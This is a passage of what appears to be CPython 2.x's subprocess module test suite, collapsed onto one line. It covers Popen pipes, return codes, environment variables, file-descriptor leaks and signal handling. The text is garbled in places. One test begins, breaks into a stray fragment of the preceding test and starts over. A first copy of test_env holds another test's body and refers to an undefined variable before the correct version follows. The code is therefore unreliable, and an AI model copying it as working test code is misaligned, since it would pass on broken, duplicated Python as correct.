"import sys; sys.exit(0)"]) self.assertEqual(rc, 0) def test_check_call_nonzero(self): # check_call() function with non-zero return code with self.assertRaises(subprocess.CalledProcessError) as c: subprocess.check_call([sys.executable, "-c", "import sys; sys.exit(47)"]) self.assertEqual(c.exception.returncode, 47) def test_check_output(self): # check_output() function with zero return code output = subprocess.check_output( [sys.executable, "-c", "print 'BDFL'"]) self.assertIn('BDFL', output) def test_check_output_nonzero(self): # check_call() function with non-zero return code with self.assertRaises(subprocess.CalledProcessError) as c: subprocess.check_output( [sys.executable, "-c", "import sys; sys.exit(5)"]) self.assertEqual(c.exception.returncode, 5) def test_check_output_stderr(self): # check_output() function stderr redirected to stdout output = subprocess.check_output( [sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"], stderr=subprocess.STDOUT) self.assertIn('BDFL', output) def test_check_output_stdout_arg(self): # check_output() function stderr redirected to stdout with self.assertRaises(ValueError) as c: output = subprocess.check_output( [sys.executable, "-c", "print 'will not be run'"], stdout=sys.stdout) self.fail("Expected ValueError when stdout arg supplied.") self.assertIn('stdout', c.exception.args[0]) def test_call_kwargs(self): # call() function with keyword args newenv = os.environ.copy() newenv["FRUIT"] = "banana" rc = subprocess.call([sys.executable, "-c", 'import sys, os;' 'sys.exit(os.getenv("FRUIT")=="banana")'], env=newenv) self.assertEqual(rc, 1) def test_invalid_args(self): # Popen() called with invalid arguments should raise TypeError # but Popen.__del__ should not complain (issue #12085) with test_support.captured_stderr() as s: self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1) argcount = subprocess.Popen.__init__.__code__.co_argcount too_many_args = [0] * (argcount + 1) self.assertRaises(TypeError, subprocess.Popen, *too_many_args) self.assertEqual(s.getvalue(), '') def test_stdin_none(self): # .stdin is None when not redirected p = subprocess.Popen([sys.executable, "-c", 'print "banana"'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) p.wait() self.assertEqual(p.stdin, None) def test_stdout_none(self): # .stdout is None when not redirected, and the child's stdout will # be inherited from the parent. In order to test this we run a # subprocess in a subprocess: # this_test # \-- subprocess created by this test (parent) # \-- subprocess created by the parent subprocess (child) # The parent doesn't specify stdout, so the child will use the # parent's stdout. This test checks that the message printed by the # child goes to the parent stdout. The parent also checks that the # child's stdout is None. See #11963. code = ('import sys; from subprocess import Popen, PIPE;' 'p = Popen([sys.executable, "-c", "print \'test_stdout_none\'"],' ' stdin=PIPE, stderr=PIPE);' 'p.wait(); assert p.stdout is None;') p = subprocess.Popen([sys.executable, "-c", code], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) out, err = p.communicate() self.assertEqual(p.returncode, 0, err) self.assertEqual(out.rstrip(), 'test_stdout_none') def test_stderr_none(self): # .stderr is None when not redirected p = subprocess.Popen([sys.executable, "-c", 'print "banana"'], stdin=subprocess.PIPE, stdout=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stdin.close) p.wait() self.assertEqual(p.stderr, None) def test_executable_with_cwd(self): python_dir = os.path.dirname(os.path.realpath(sys.executable)) p = subprocess.Popen(["somethingyoudonthave", "-c", "import sys; sys.exit(47)"], executable=sys.executable, cwd=python_dir) p.wait() self.assertEqual(p.returncode, 47) @unittest.skipIf(sysconfig.is_python_build(), "need an installed Python. See #7774") def test_executable_without_cwd(self): # For a normal installation, it should work without 'cwd' # argument. For test runs in the build directory, see #7774. p = subprocess.Popen(["somethingyoudonthave", "-c", "import sys; sys.exit(47)"], executable=sys.executable) p.wait() self.assertEqual(p.returncode, 47) def test_stdin_pipe(self): # stdin redirection p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.exit(sys.stdin.read() == "pear")'], stdin=subprocess.PIPE) p.stdin.write("pear") p.stdin.close() p.wait() self.assertEqual(p.returncode, 1) def test_stdin_filedes(self): # stdin is set to open file descriptor tf = tempfile.TemporaryFile() d = tf.fileno() os.write(d, "pear") os.lseek(d, 0, 0) p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.exit(sys.stdin.read() == "pear")'], stdin=d) p.wait() self.assertEqual(p.returncode, 1) def test_stdin_fileobj(self): # stdin is set to open file object tf = tempfile.TemporaryFile() tf.write("pear") tf.seek(0) p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.exit(sys.stdin.read() == "pear")'], stdin=tf) p.wait() self.assertEqual(p.returncode, 1) def test_stdout_pipe(self): # stdout redirection p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("orange")'], stdout=subprocess.PIPE) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read(), "orange") def test_stdout_filedes(self): # stdout is set to open file descriptor tf = tempfile.TemporaryFile() d = tf.fileno() p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("orange")'], stdout=d) p.wait() os.lseek(d, 0, 0) self.assertEqual(os.read(d, 1024), "orange") def test_stdout_fileobj(self): # stdout is set to open file object tf = tempfile.TemporaryFile() p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("orange")'], stdout=tf) p.wait() tf.seek(0) self.assertEqual(tf.read(), "orange") def test_stderr_pipe(self): # stderr redirection p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("strawberry")'], stderr=subprocess.PIPE) self.addCleanup(p.stderr.close) self.assertStderrEqual(p.stderr.read(), "strawberry") def test_stderr_filedes(self): # stderr is set to open file descriptor tf = tempfile.TemporaryFile() d = tf.fileno() p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("strawberry")'], stderr=d) p.wait() os.lseek(d, 0, 0) self.assertStderrEqual(os.read(d, 1024), "strawberry") def test_stderr_fileobj(self): # stderr is set to open file object tf = tempfile.TemporaryFile() p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("strawberry")'], stderr=tf) p.wait() tf.seek(0) self.assertStderrEqual(tf.read(), "strawberry") def test_stderr_redirect_with_no_stdout_redirect(self): # test stderr=STDOUT while stdout=None (not set) # - grandchild prints to stderr # - child redirects grandchild's stderr to its stdout # - the parent should get grandchild's stderr in child's stdout p = subprocess.Popen([sys.executable, "-c", 'import sys, subprocess;' 'rc = subprocess.call([sys.executable, "-c",' ' "import sys;"' ' "sys.stderr.write(\'42\')"],' ' stderr=subprocess.STDOUT);' 'sys.exit(rc)'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = p.communicate() #NOTE: stdout should get stderr from grandchild self.assertStderrEqual(stdout, b'42') self.assertStderrEqual(stderr, b'') # should be empty self.assertEqual(p.returncode, 0) def test_stdout_stderr_pipe(self): # capture stdout and stderr to the same pipe p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdout.write("apple");' 'sys.stdout.flush();' 'sys.stderr.write("orange")'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) self.addCleanup(p.stdout.close) self.assertStderrEqual(p.stdout.read(), "appleorange") def test_stdout_stderr_file(self): # capture stdout and stderr to the same open file tf = tempfile.TemporaryFile() p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdout.write("apple");' 'sys.stdout.flush();' 'sys.stderr.write("orange")'], stdout=tf, stderr=tf) p.wait() tf.seek(0) self.assertStderrEqual(tf.read(), "appleorange") def test_stdout_filedes_of_stdout(self): # stdout is set to 1 (#1531862). # p.wait() tf.seek(0) self.assertStderrEqual(tf.read(), "appleorange") def test_stdout_filedes_of_stdout(self): # stdout is set to 1 (#1531862). # To avoid printing the text on stdout, we do something similar to # test_stdout_none (see above). The parent subprocess calls the child # subprocess passing stdout=1, and this test uses stdout=PIPE in # order to capture and check the output of the parent. See #11963. code = ('import sys, subprocess; ' 'rc = subprocess.call([sys.executable, "-c", ' ' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), ' '\'test with stdout=1\'))"], stdout=1); ' 'assert rc == 18') p = subprocess.Popen([sys.executable, "-c", code], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) out, err = p.communicate() self.assertEqual(p.returncode, 0, err) self.assertEqual(out.rstrip(), 'test with stdout=1') def test_cwd(self): tmpdir = tempfile.gettempdir() # We cannot use os.path.realpath to canonicalize the path, # since it doesn't expand Tru64 {memb} strings. See bug 1063571. cwd = os.getcwd() os.chdir(tmpdir) tmpdir = os.getcwd() os.chdir(cwd) p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(os.getcwd())'], stdout=subprocess.PIPE, cwd=tmpdir) self.addCleanup(p.stdout.close) normcase = os.path.normcase self.assertEqual(normcase(p.stdout.read()), normcase(tmpdir)) def test_env(self): newenv = os.environ.copy() newenv["FRUIT"] = "orange" p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(os.getcwd())'], stdout=subprocess.PIPE, cwd=tmpdir) self.addCleanup(p.stdout.close) normcase = os.path.normcase self.assertEqual(normcase(p.stdout.read()), normcase(tmpdir)) def test_env(self): newenv = os.environ.copy() newenv["FRUIT"] = "orange" p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(os.getenv("FRUIT"))'], stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read(), "orange") def test_communicate_stdin(self): p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.exit(sys.stdin.read() == "pear")'], stdin=subprocess.PIPE) p.communicate("pear") self.assertEqual(p.returncode, 1) def test_communicate_stdout(self): p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("pineapple")'], stdout=subprocess.PIPE) (stdout, stderr) = p.communicate() self.assertEqual(stdout, "pineapple") self.assertEqual(stderr, None) def test_communicate_stderr(self): p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("pineapple")'], stderr=subprocess.PIPE) (stdout, stderr) = p.communicate() self.assertEqual(stdout, None) self.assertStderrEqual(stderr, "pineapple") def test_communicate(self): p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stderr.write("pineapple");' 'sys.stdout.write(sys.stdin.read())'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) (stdout, stderr) = p.communicate("banana") self.assertEqual(stdout, "banana") self.assertStderrEqual(stderr, "pineapple") # This test is Linux specific for simplicity to at least have # some coverage. It is not a platform specific bug. @unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()), "Linux specific") # Test for the fd leak reported in http://bugs.python.org/issue2791. def test_communicate_pipe_fd_leak(self): fd_directory = '/proc/%d/fd' % os.getpid() num_fds_before_popen = len(os.listdir(fd_directory)) p = subprocess.Popen([sys.executable, "-c", "print()"], stdout=subprocess.PIPE) p.communicate() num_fds_after_communicate = len(os.listdir(fd_directory)) del p num_fds_after_destruction = len(os.listdir(fd_directory)) self.assertEqual(num_fds_before_popen, num_fds_after_destruction) self.assertEqual(num_fds_before_popen, num_fds_after_communicate) def test_communicate_returns(self): # communicate() should return None if no redirection is active p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(47)"]) (stdout, stderr) = p.communicate() self.assertEqual(stdout, None) self.assertEqual(stderr, None) def test_communicate_pipe_buf(self): # communicate() with writes larger than pipe_buf # This test will probably deadlock rather than fail, if # communicate() does not work properly. x, y = os.pipe() if mswindows: pipe_buf = 512 else: pipe_buf = os.fpathconf(x, "PC_PIPE_BUF") os.close(x) os.close(y) p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(sys.stdin.read(47));' 'sys.stderr.write("xyz"*%d);' 'sys.stdout.write(sys.stdin.read())' % pipe_buf], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) string_to_write = "abc"*pipe_buf (stdout, stderr) = p.communicate(string_to_write) self.assertEqual(stdout, string_to_write) def test_writes_before_communicate(self): # stdin.write before communicate() p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(sys.stdin.read())'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) p.stdin.write("banana") (stdout, stderr) = p.communicate("split") self.assertEqual(stdout, "bananasplit") self.assertStderrEqual(stderr, "") def test_universal_newlines(self): p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' + SETBINARY + 'sys.stdout.write("line1\\n");' 'sys.stdout.flush();' 'sys.stdout.write("line2\\r");' 'sys.stdout.flush();' 'sys.stdout.write("line3\\r\\n");' 'sys.stdout.flush();' 'sys.stdout.write("line4\\r");' 'sys.stdout.flush();' 'sys.stdout.write("\\nline5");' 'sys.stdout.flush();' 'sys.stdout.write("\\nline6");'], stdout=subprocess.PIPE, universal_newlines=1) self.addCleanup(p.stdout.close) stdout = p.stdout.read() if hasattr(file, 'newlines'): # Interpreter with universal newline support self.assertEqual(stdout, "line1\nline2\nline3\nline4\nline5\nline6") else: # Interpreter without universal newline support self.assertEqual(stdout, "line1\nline2\rline3\r\nline4\r\nline5\nline6") def test_universal_newlines_communicate(self): # universal newlines through communicate() p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' + SETBINARY + 'sys.stdout.write("line1\\n");' 'sys.stdout.flush();' 'sys.stdout.write("line2\\r");' 'sys.stdout.flush();' 'sys.stdout.write("line3\\r\\n");' 'sys.stdout.flush();' 'sys.stdout.write("line4\\r");' 'sys.stdout.flush();' 'sys.stdout.write("\\nline5");' 'sys.stdout.flush();' 'sys.stdout.write("\\nline6");'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=1) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) (stdout, stderr) = p.communicate() if hasattr(file, 'newlines'): # Interpreter with universal newline support self.assertEqual(stdout, "line1\nline2\nline3\nline4\nline5\nline6") else: # Interpreter without universal newline support self.assertEqual(stdout, "line1\nline2\rline3\r\nline4\r\nline5\nline6") def test_no_leaking(self): # Make sure we leak no resources if not mswindows: max_handles = 1026 # too much for most UNIX systems else: max_handles = 2050 # too much for (at least some) Windows setups handles = [] try: for i in range(max_handles): try: handles.append(os.open(test_support.TESTFN, os.O_WRONLY | os.O_CREAT)) except OSError as e: if e.errno != errno.EMFILE: raise break else: self.skipTest("failed to reach the file descriptor limit " "(tried %d)" % max_handles) # Close a couple of them (should be enough for a subprocess) for i in range(10): os.close(handles.pop()) # Loop creating some subprocesses. If one of them leaks some fds, # the next loop iteration will fail by reaching the max fd limit. for i in range(15): p = subprocess.Popen([sys.executable, "-c", "import sys;" "sys.stdout.write(sys.stdin.read())"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) data = p.communicate(b"lime")[0] self.assertEqual(data, b"lime") finally: for h in handles: os.close(h) test_support.unlink(test_support.TESTFN) def test_list2cmdline(self): self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']), '"a b c" d e') self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']), 'ab\\"c \\ d') self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']), 'ab\\"c " \\\\" d') self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']), 'a\\\\\\b "de fg" h') self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']), 'a\\\\\\"b c d') self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']), '"a\\\\b c" d e') self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']), '"a\\\\b\\ c" d e') self.assertEqual(subprocess.list2cmdline(['ab', '']), 'ab ""') def test_poll(self): p = subprocess.Popen([sys.executable, "-c", "import time; time.sleep(1)"]) count = 0 while p.poll() is None: time.sleep(0.1) count += 1 # We expect that the poll loop probably went around about 10 times, # but, based on system scheduling we can't control, it's possible # poll() never returned None. It "should be" very rare that it # didn't go around at least twice. self.assertGreaterEqual(count, 2) # Subsequent invocations should just return the returncode self.assertEqual(p.poll(), 0) def test_wait(self): p = subprocess.Popen([sys.executable, "-c", "import time; time.sleep(2)"]) self.assertEqual(p.wait(), 0) # Subsequent invocations should just return the returncode self.assertEqual(p.wait(), 0) def test_invalid_bufsize(self): # an invalid type of the bufsize argument should raise # TypeError. with self.assertRaises(TypeError): subprocess.Popen([sys.executable, "-c", "pass"], "orange") def test_leaking_fds_on_error(self): # see bug #5179: Popen leaks file descriptors to PIPEs if # the child fails to execute; this will eventually exhaust # the maximum number of open fds. 1024 seems a very common # value for that limit, but Windows has 2048, so we loop # 1024 times (each call leaked two fds). for i in range(1024): # Windows raises IOError. Others raise OSError. with self.assertRaises(EnvironmentError) as c: subprocess.Popen(['nonexisting_i_hope'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) # ignore errors that indicate the command was not found if c.exception.errno not in (errno.ENOENT, errno.EACCES): raise c.exception @unittest.skipIf(threading is None, "threading required") def test_double_close_on_error(self): # Issue #18851 fds = [] def open_fds(): for i in range(20): fds.extend(os.pipe()) time.sleep(0.001) t = threading.Thread(target=open_fds) t.start() try: with self.assertRaises(EnvironmentError): subprocess.Popen(['nonexisting_i_hope'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) finally: t.join() exc = None for fd in fds: # If a double close occurred, some of those fds will # already have been closed by mistake, and os.close() # here will raise. try: os.close(fd) except OSError as e: exc = e if exc is not None: raise exc def test_handles_closed_on_exception(self): # If CreateProcess exits with an error, ensure the # duplicate output handles are released ifhandle, ifname = tempfile.mkstemp() ofhandle, ofname = tempfile.mkstemp() efhandle, efname = tempfile.mkstemp() try: subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle, stderr=efhandle) except OSError: os.close(ifhandle) os.remove(ifname) os.close(ofhandle) os.remove(ofname) os.close(efhandle) os.remove(efname) self.assertFalse(os.path.exists(ifname)) self.assertFalse(os.path.exists(ofname)) self.assertFalse(os.path.exists(efname)) def test_communicate_epipe(self): # Issue 10963: communicate() should hide EPIPE p = subprocess.Popen([sys.executable, "-c", 'pass'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) p.communicate("x" * 2**20) def test_communicate_epipe_only_stdin(self): # Issue 10963: communicate() should hide EPIPE p = subprocess.Popen([sys.executable, "-c", 'pass'], stdin=subprocess.PIPE) self.addCleanup(p.stdin.close) time.sleep(2) p.communicate("x" * 2**20) # This test is Linux-ish specific for simplicity to at least have # some coverage. It is not a platform specific bug. @unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()), "Linux specific") def test_failed_child_execute_fd_leak(self): """Test for the fork() failure fd leak reported in issue16327.""" fd_directory = '/proc/%d/fd' % os.getpid() fds_before_popen = os.listdir(fd_directory) with self.assertRaises(PopenTestException): PopenExecuteChildRaises( [sys.executable, '-c', 'pass'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # NOTE: This test doesn't verify that the real _execute_child # does not close the file descriptors itself on the way out # during an exception. Code inspection has confirmed that. fds_after_exception = os.listdir(fd_directory) self.assertEqual(fds_before_popen, fds_after_exception) # context manager class _SuppressCoreFiles(object): """Try to prevent core files from being created.""" old_limit = None def __enter__(self): """Try to save previous ulimit, then set it to (0, 0).""" if resource is not None: try: self.old_limit = resource.getrlimit(resource.RLIMIT_CORE) resource.setrlimit(resource.RLIMIT_CORE, (0, 0)) except (ValueError, resource.error): pass if sys.platform == 'darwin': # Check if the 'Crash Reporter' on OSX was configured # in 'Developer' mode and warn that it will get triggered # when it is. # # This assumes that this context manager is used in tests # that might trigger the next manager. value = subprocess.Popen(['/usr/bin/defaults', 'read', 'com.apple.CrashReporter', 'DialogType'], stdout=subprocess.PIPE).communicate()[0] if value.strip() == b'developer': print "this tests triggers the Crash Reporter, that is intentional" sys.stdout.flush() def __exit__(self, *args): """Return core file behavior to default.""" if self.old_limit is None: return if resource is not None: try: resource.setrlimit(resource.RLIMIT_CORE, self.old_limit) except (ValueError, resource.error): pass @unittest.skipUnless(hasattr(signal, 'SIGALRM'), "Requires signal.SIGALRM") def test_communicate_eintr(self): # Issue #12493: communicate() should handle EINTR def handler(signum, frame): pass old_handler = signal.signal(signal.SIGALRM, handler) self.addCleanup(signal.signal, signal.SIGALRM, old_handler) # the process is running for 2 seconds args = [sys.executable, "-c", 'import time; time.sleep(2)'] for stream in ('stdout', 'stderr'): kw = {stream: subprocess.PIPE} with subprocess.Popen(args, **kw) as process: signal.alarm(1) # communicate() will be interrupted by SIGALRM process.communicate() @unittest.skipIf(mswindows, "POSIX specific tests") class POSIXProcessTestCase(BaseTestCase): def test_exceptions(self): # caught & re-raised exceptions with self.assertRaises(OSError) as c: p = subprocess.Popen([sys.executable, "-c", ""], cwd="/this/path/does/not/exist") # The attribute child_traceback should contain "os.chdir" somewhere. self.assertIn("os.chdir", c.exception.child_traceback) def test_run_abort(self): # returncode handles signal termination with _SuppressCoreFiles(): p = subprocess.Popen([sys.executable, "-c", "import os; os.abort()"]) p.wait() self.assertEqual(-p.returncode, signal.SIGABRT) def test_preexec(self): # preexec function p = subprocess.Popen([sys.executable, "-c", "import sys, os;" "sys.stdout.write(os.getenv('FRUIT'))"], stdout=subprocess.PIPE, preexec_fn=lambda: os.putenv("FRUIT", "apple")) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read(), "apple") class _TestExecuteChildPopen(subprocess.Popen): """Used to test behavior at the end of _execute_child.""" def __init__(self, testcase, *args, **kwargs): self._testcase = testcase subprocess.Popen.__init__(self, *args, **kwargs) def _execute_child( self, args, executable, preexec_fn, close_fds, cwd, env, universal_newlines, startupinfo, creationflags, shell, to_close, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite): try: subprocess.Popen._execute_child( self, args, executable, preexec_fn, close_fds, cwd, env, universal_newlines, startupinfo, creationflags, shell, to_close, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) finally: # Open a bunch of file descriptors and verify that # none of them are the same as the ones the Popen # instance is using for stdin/stdout/stderr. devzero_fds = [os.open("/dev/zero", os.O_RDONLY) for _ in range(8)] try: for fd in devzero_fds: self._testcase.assertNotIn( fd, (p2cwrite, c2pread, errread)) finally: for fd in devzero_fds: os.close(fd) @unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.") def test_preexec_errpipe_does_not_double_close_pipes(self): """Issue16140: Don't double close pipes on preexec error.""" def raise_it(): raise RuntimeError("force the _execute_child() errpipe_data path.") with self.assertRaises(RuntimeError): self._TestExecuteChildPopen( self, [sys.executable, "-c", "pass"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, preexec_fn=raise_it) def test_args_string(self): # args is a string f, fname = tempfile.mkstemp() os.write(f, "#!/bin/sh\n") os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" % sys.executable) os.close(f) os.chmod(fname, 0o700) p = subprocess.Popen(fname) p.wait() os.remove(fname) self.assertEqual(p.returncode, 47) def test_invalid_args(self): # invalid arguments should raise ValueError self.assertRaises(ValueError, subprocess.call, [sys.executable, "-c", "import sys; sys.exit(47)"], startupinfo=47) self.assertRaises(ValueError, subprocess.call, [sys.executable, "-c", "import sys; sys.exit(47)"], creationflags=47) def test_shell_sequence(self): # Run command through the shell (sequence) newenv = os.environ.copy() newenv["FRUIT"] = "apple" p = subprocess.Popen(["echo $FRUIT"], shell=1, stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read().strip(), "apple") def test_shell_string(self): # Run command through the shell (string) newenv = os.environ.copy() newenv["FRUIT"] = "apple" p = subprocess.Popen("echo $FRUIT", shell=1, stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read().strip(), "apple") def test_call_string(self): # call() function with string argument on UNIX f, fname = tempfile.mkstemp() os.write(f, "#!/bin/sh\n") os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" % sys.executable) os.close(f) os.chmod(fname, 0700) rc = subprocess.call(fname) os.remove(fname) self.assertEqual(rc, 47) def test_specific_shell(self): # Issue #9265: Incorrect name passed as arg[0]. shells = [] for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']: for name in ['bash', 'ksh']: sh = os.path.join(prefix, name) if os.path.isfile(sh): shells.append(sh) if not shells: # Will probably work for any shell but csh. self.skipTest("bash or ksh required for this test") sh = '/bin/sh' if os.path.isfile(sh) and not os.path.islink(sh): # Test will fail if /bin/sh is a symlink to csh. shells.append(sh) for sh in shells: p = subprocess.Popen("echo $0", executable=sh, shell=True, stdout=subprocess.PIPE) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read().strip(), sh) def _kill_process(self, method, *args): # Do not inherit file handles from the parent. # It should fix failures on some platforms. p = subprocess.Popen([sys.executable, "-c", """if 1: import sys, time sys.stdout.write('x\\n') sys.stdout.flush() time.sleep(30) """], close_fds=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # Wait for the interpreter to be completely initialized before # sending any signal. p.stdout.read(1) getattr(p, method)(*args) return p @unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')), "Due to known OS bug (issue #16762)") def _kill_dead_process(self, method, *args): # Do not inherit file handles from the parent. # It should fix failures on some platforms. p = subprocess.Popen([sys.executable, "-c", """if 1: import sys, time sys.stdout.write('x\\n') sys.stdout.flush() """], close_fds=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # Wait for the interpreter to be completely initialized before # sending any signal. p.stdout.read(1) # The process should end after this time.sleep(1) # This shouldn't raise even though the child is now dead getattr(p, method)(*args) p.communicate() def test_send_signal(self): p = self._kill_process('send_signal', signal.SIGINT) _, stderr = p.communicate() self.assertIn('KeyboardInterrupt', stderr) self.assertNotEqual(p.wait(), 0) def test_kill(self): p = self._kill_process('kill') _, stderr = p.communicate() self.assertStderrEqual(stderr, '') self.assertEqual(p.wait(), -signal.SIGKILL) def test_terminate(self): p = self._kill_process('terminate') _, stderr = p.communicate() self.assertStderrEqual(stderr, '') self.assertEqual(p.wait(), -signal.SIGTERM) def test_send_signal_dead(self): # Sending a signal to a dead process self._kill_dead_process('send_signal', signal.SIGINT) def test_kill_dead(self): # Killing a dead process self._kill_dead_process('kill') def test_terminate_dead(self): # Terminating a dead process self._kill_dead_process('terminate') def check_close_std_fds(self, fds): # Issue #9905: test that subprocess pipes still work properly with # some standard fds closed stdin = 0 newfds = [] for a in fds: b = os.dup(a) newfds.append(b) if a == 0: stdin = b try: for fd in fds: os.close(fd) out, err = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdout.write("apple");' 'sys.stdout.flush();' 'sys.stderr.write("orange")'], stdin=stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate() err = test_support.strip_python_stderr(err) self.assertEqual((out, err), (b'apple', b'orange')) finally: for b, a in zip(newfds, fds): os.dup2(b, a) for b in newfds: os.close(b) def test_close_fd_0(self): self.check_close_std_fds([0]) def test_close_fd_1(self): self.check_close_std_fds([1]) def test_close_fd_2(self): self.check_close_std_fds([2]) def test_close_fds_0_1(self): self.check_close_std_fds([0, 1]) def test_close_fds_0_2(self): self.check_close_std_fds([0, 2]) def test_close_fds_1_2(self): self.check_close_std_fds([1, 2]) def test_close_fds_0_1_2(self): # Issue #10806: test that subprocess pipes still work properly with # all standard fds closed. self.check_close_std_fds([0, 1, 2]) def check_swap_fds(self, stdin_no, stdout_no, stderr_no): # open up some temporary files temps = [tempfile.mkstemp() for i in range(3)] temp_fds = [fd for fd, fname in temps] try: # unlink the files -- we won't need to reopen them for fd, fname in temps: os.unlink(fname) # save a copy of the standard file descriptors saved_fds = [os.dup(fd) for fd in range(3)] try: # duplicate the temp files over the standard fd's 0, 1, 2 for fd, temp_fd in enumerate(temp_fds): os.dup2(temp_fd, fd) # write some data to what will become stdin, and rewind os.write(stdin_no, b"STDIN") os.lseek(stdin_no, 0, 0) # now use those files in the given order, so that subprocess # has to rearrange them in the child p = subprocess.Popen([sys.executable, "-c", 'import sys; got = sys.stdin.read();' 'sys.stdout.write("got %s"%got); sys.stderr.write("err")'], stdin=stdin_no, stdout=stdout_no, stderr=stderr_no) p.wait() for fd in temp_fds: os.lseek(fd, 0, 0) out = os.read(stdout_no, 1024) err = test_support.strip_python_stderr(os.read(stderr_no, 1024)) finally: for std, saved in enumerate(saved_fds): os.dup2(saved, std) os.close(saved) self.assertEqual(out, b"got STDIN") self.assertEqual(err, b"err") finally: for fd in temp_fds: os.close(fd) # When duping fds, if there arises a situation where one of the fds is # either 0, 1 or 2, it is possible that it is overwritten (#12607). # This tests all combinations of this. def test_swap_fds(self): self.check_swap_fds(0, 1, 2) self.check_swap_fds(0, 2, 1) self.check_swap_fds(1, 0, 2) self.check_swap_fds(1, 2, 0) self.check_swap_fds(2, 0, 1) self.check_swap_fds(2, 1, 0) def test_wait_when_sigchild_ignored(self): # NOTE: sigchild_ignore.py may not be an effective test on all OSes. sigchild_ignore = test_support.findfile("sigchild_ignore.py", subdir="subprocessdata") p = subprocess.Popen([sys.executable, sigchild_ignore], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = p.communicate() self.assertEqual(0, p.returncode, "sigchild_ignore.py exited" " non-zero with this error:\n%s" % stderr) def test_zombie_fast_process_del(self): # Issue #12650: on Unix, if Popen.__del__() was called before the # process exited, it wouldn't be added to subprocess._active, and would # 